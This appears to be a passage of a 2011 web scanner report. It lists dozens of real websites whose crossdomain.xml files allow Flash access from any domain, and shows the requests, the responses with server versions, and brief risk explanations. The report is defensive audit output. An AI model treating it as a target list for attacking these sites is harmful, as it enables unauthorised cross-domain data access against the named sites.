Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.56. http://www.instantpresenter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.instantpresenter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instantpresenter.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sat, 11 Sep 2010 02:14:02 GMT
Accept-Ranges: bytes
ETag: "903fa105751cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:43:06 GMT
Connection: keep-alive
Content-Length: 198

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.57. http://www.irenewdemos.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.irenewdemos.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.irenewdemos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 03 Nov 2009 14:07:11 GMT
ETag: "264aea9-c6-2a521c0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.58. http://www.itworld.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itworld.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.itworld.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (EL)
Last-Modified: Wed, 22 Dec 2010 00:11:38 GMT
ETag: "2c0686-9c-497f498c98280"
Cache-Control: max-age=1209600
Content-Type: text/xml
Content-Length: 156
X-Cacheable: YES
Date: Wed, 04 May 2011 02:09:36 GMT
X-Varnish: 496766903
Via: 1.1 varnish
age: 0
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
</cross-domain-policy>

6.59. http://www.jcosplay.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jcosplay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jcosplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:01 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 10:29:05 GMT
ETag: "3e88008-8d-4cb589f1"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

6.60. http://www.jewishxdate.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jewishxdate.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jewishxdate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:13 GMT
Server: Apache
Last-Modified: Fri, 11 Dec 2009 13:45:23 GMT
ETag: "3e0125-68-47a7422a6e2c0"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.61. http://www.jhunewsletter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jhunewsletter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jhunewsletter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:49 GMT
Server: Apache/1.3.37 (Win32) mod_gzip/1.3.26.1a JRun/4.0
Cache-Control: max-age=1200, s-max-age=1200
Last-Modified: Mon, 14 Aug 2006 05:40:42 GMT
ETag: "0-69-44e00cda"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.62. http://www.kansasspeedway.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kansasspeedway.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kansasspeedway.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Dec 2008 23:09:32 GMT
Accept-Ranges: bytes
ETag: "8e12fbb0ae5cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 347
Cache-Control: max-age=604782
Date: Wed, 04 May 2011 01:12:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.63. http://www.karafun.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.karafun.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.karafun.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:09 GMT
Server: Apache/2
Last-Modified: Mon, 25 Oct 2010 13:57:52 GMT
ETag: "94d689-d1-4937160d4f800"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domai
...[SNIP]...

6.64. http://www.kedscollective.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kedscollective.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kedscollective.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:17 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.2 with Suhosin-Patch
Last-Modified: Fri, 16 Oct 2009 18:15:30 GMT
ETag: "974992-69-47611618d1480;476116225ab00"
Accept-Ranges: bytes
Content-Length: 105
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 04:12:17 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.65. http://www.keyhealthclub.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.keyhealthclub.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keyhealthclub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:32 GMT
Server: Apache
Last-Modified: Fri, 14 May 2010 09:52:14 GMT
ETag: "30014c3-68-4bed1d4e"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.66. http://www.kiss107.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kiss107.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kiss107.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188967027 3188957227
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:50:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:50:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.67. http://www.kissfunny.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kissfunny.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kissfunny.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/xml
Last-Modified: Thu, 18 Dec 2008 03:57:52 GMT
Accept-Ranges: bytes
ETag: "50d17cdc460c91:3e5f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<allo
...[SNIP]...

6.68. http://www.learningcurve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.learningcurve.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.learningcurve.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:02 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 01 Feb 2011 17:45:09 GMT
ETag: "196b6a-18d-49b3c17f33340"
Accept-Ranges: bytes
Content-Length: 397
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="content.learningcurve.com" />
...[SNIP]...

6.69. http://www.legalseafoods.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.legalseafoods.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.legalseafoods.com

Response

HTTP/1.1 200 OK
Content-Length: 133
Content-Type: text/xml
Content-Location: http://www.legalseafoods.com/crossdomain.xml
Last-Modified: Fri, 05 Feb 2010 23:52:02 GMT
Accept-Ranges: bytes
ETag: "b8428436bea6ca1:436"
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 01:56:00 GMT
Connection: close
Set-Cookie: B100Serverpoolcookie=4090937773.1.4137129920.3954557245; path=/

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.70. http://www.localfordoffer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.localfordoffer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.localfordoffer.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 10 Jun 2010 20:56:18 GMT
Accept-Ranges: bytes
ETag: "05505fdf8cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:10:41 GMT
Connection: close
Content-Length: 240

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" to-ports="80,443" />
...[SNIP]...

6.71. http://www.machomoe.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.machomoe.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.machomoe.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30 mod_fcgid/2.3.5
Last-Modified: Thu, 30 Sep 2010 18:55:44 GMT
ETag: "1df150-67-4917ea00dac00"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.72. http://www.madtwist.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.madtwist.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.madtwist.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:47 GMT
Server: Apache
Last-Modified: Wed, 26 Nov 2008 15:14:07 GMT
ETag: "622804-cd-45c99144a2dc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.73. http://www.marcjacobs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marcjacobs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marcjacobs.com

Response

HTTP/1.1 200 OK
Content-Length: 137
Content-Type: text/xml
Content-Location: http://www.marcjacobs.com/crossdomain.xml
Last-Modified: Tue, 08 Mar 2011 01:19:01 GMT
Accept-Ranges: bytes
ETag: "6710cdce2eddcb1:b07"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
sv: 5
Date: Wed, 04 May 2011 02:54:49 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.74. http://www.matchbox.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.matchbox.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.matchbox.com

Response

HTTP/1.1 200 OK
Content-Length: 426
Content-Type: text/xml
Last-Modified: Thu, 29 Oct 2009 17:28:07 GMT
Accept-Ranges: bytes
ETag: "e86d162ebd58ca1:4b6"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:09:56 GMT
Connection: keep-alive
Set-Cookie: NSC_Ljet_Xfcgbsn=440af0ad3660;expires=Wed, 04-May-11 03:12:26 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="mbws.mattel.com" />
<allow-access-from domain="estwr-25-90.corp.mattel.com" />
<allow-access-from domain="battleforce5.com" />
<allow-access-from domain="dev.battleforce5.net" />
...[SNIP]...

6.75. http://www.mediapost.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mediapost.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mediapost.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:03:42 GMT
Server: Apache/2.2.15 (Unix) DAV/2 PHP/5.3.2 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0a mod_wsgi/3.2 Python/2.6.5 JRun/4.0
Last-Modified: Fri, 11 Jul 2008 18:53:49 GMT
ETag: "2a7f8-10d-451c40fe5c940"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domai
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.76. http://www.mertado.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mertado.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mertado.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:33:28 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Fri, 15 Oct 2010 01:33:28 GMT
ETag: "1d14e6-66-4929dd03caa00"
Accept-Ranges: bytes
Content-Length: 102
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 01:33:28 GMT
Vary: Accept-Encoding,User-Agent

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.77. http://www.michellebranch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.michellebranch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.michellebranch.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:02:19 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 29 Oct 2008 18:27:57 GMT
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:02:19 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.78. http://www.mix961.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mix961.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mix961.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3192831855
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 04:13:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 04:13:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.79. http://www.mofuse.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mofuse.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mofuse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:23 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 09 Mar 2011 23:32:08 GMT
ETag: "28f86b6-64-49e1523256e00"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.80. http://www.mountainrailwv.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mountainrailwv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mountainrailwv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:01 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 25 Apr 2010 17:22:40 GMT
ETag: "110c367-cb-48512e84b5800"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-poli
...[SNIP]...

6.81. http://www.moxieteenz.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.moxieteenz.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moxieteenz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 03 Jan 2011 23:16:03 GMT
ETag: "5e1add-137-498f955f152c0"
Accept-Ranges: bytes
Content-Length: 311
Connection: close
Content-Type: application/xml
Set-Cookie: stickysession=brweb03; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

6.82. http://www.myfoxlubbock.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myfoxlubbock.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myfoxlubbock.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:21 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n20 ( iad-agg-n7), ms iad-agg-n7 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:19:22 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.83. http://www.n9negroup.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.n9negroup.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.n9negroup.com

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/xml
Content-Location: http://www.n9negroup.com/crossdomain.xml
Last-Modified: Fri, 14 Mar 2008 09:10:08 GMT
Accept-Ranges: bytes
ETag: "508b6133b385c81:494c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:10:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.84. http://www.needstosell.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.needstosell.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.needstosell.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:44 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Tue, 05 Jan 2010 01:09:47 GMT
ETag: "1bb1326-8d-7e72ccc0"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.85. http://www.netscrap.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netscrap.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netscrap.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:58:34 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Wed, 22 Oct 2008 21:10:41 GMT
ETag: "10f2aea38a34c91:118c"
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.86. http://www.nevershoutnever.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nevershoutnever.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nevershoutnever.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:12 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 29 Oct 2008 18:27:57 GMT
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:10:12 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.87. http://www.newschannel34.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newschannel34.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newschannel34.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:54 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n34.panthercdn.com
ETag: "3b718a58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 03:23:22 GMT
Age: 32
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.88. http://www.nextbus.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nextbus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nextbus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:23 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7m DAV/2 mod_jk/1.2.30
Last-Modified: Mon, 12 Apr 2010 23:30:53 GMT
ETag: "18280d6-1c3-8933e540"
Accept-Ranges: bytes
Content-Length: 451
Connection: close
Content-Type: application/xml
Set-Cookie: Coyote-2-d0b8d6f5=c0a80a64:0; path=/

<?xml version="1.0"?>
<!-- This ifile isi needed by Adobe based (such as Flash based) clients
so that the Flash or such source files can come through one deomain
but the data through the www
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.89. http://www.nfb.ca/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nfb.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nfb.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:33 GMT
Server: Apache
Content-Length: 318
Content-Language: en
Expires: Wed, 04 May 2011 02:44:08 GMT
Vary: Accept-Language,Cookie,Accept-Encoding,User-Agent
Last-Modified: Wed, 04 May 2011 02:34:08 GMT
ETag: "52b0e374b710fc4e4f91cb3637581129"
Cache-Control: max-age=600
Set-Cookie: sessionid=84be5739a91521b727184ea919f48d14; expires=Wed, 18-May-2011 02:38:33 GMT; Max-Age=1209600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NFBSERV=tube2; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.90. http://www.ntv.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ntv.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ntv.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 04:03:18 GMT
Content-Type: text/xml
Content-Length: 213
Last-Modified: Wed, 25 Feb 2009 14:04:18 GMT
Connection: close
Expires: Wed, 04 May 2011 05:03:18 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" ports="*"/>
</cross-d
...[SNIP]...

6.91. http://www.officialsanctuary.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.officialsanctuary.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.officialsanctuary.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:05 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 13:22:09 GMT
ETag: "10a83a-d4-486de3a7d6240"
Accept-Ranges: bytes
Content-Length: 212
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-dom
...[SNIP]...

6.92. http://www.openfilm.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.openfilm.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

